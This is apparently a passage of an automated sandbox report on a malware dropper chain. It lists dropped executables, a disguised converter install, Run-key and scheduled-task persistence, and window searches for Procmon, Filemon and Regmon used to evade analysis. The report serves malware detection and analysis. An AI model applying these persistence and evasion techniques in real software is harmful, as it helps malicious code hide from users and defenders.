                            Source: 4ee3234999.exe.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csHigh entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comFile created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuuc51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libGLESv2.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\is-2E87P.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcr100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-TBCD3.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_isdecmp.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_isdecmp.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062131001\d37c6a3c82.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5PrintSupport.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comFile created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuin51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062132001\513076b4b2.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-B6V2L.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-F3L00.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-SOSP7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-2RO6E.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5Concurrent.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libEGL.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062130001\072d564b60.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_iscrypt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeFile created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-LC5T3.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-S5638.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\infinity[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062133001\6299d9e5a5.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Roaming\is-M72JG.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcp100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeFile created: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeFile created: C:\ProgramData\Flv2AVIConverter\sqlite3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-CAFKN.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeFile created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpFile created: C:\Users\user\AppData\Local\is-0DEO7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeFile created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-PJU74.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\sqlite3.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpFile created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeFile created: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeFile created: C:\ProgramData\Flv2AVIConverter\sqlite3.dllJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exeJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: RegmonclassJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: FilemonclassJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWindow searched: window name: RegmonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmdJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
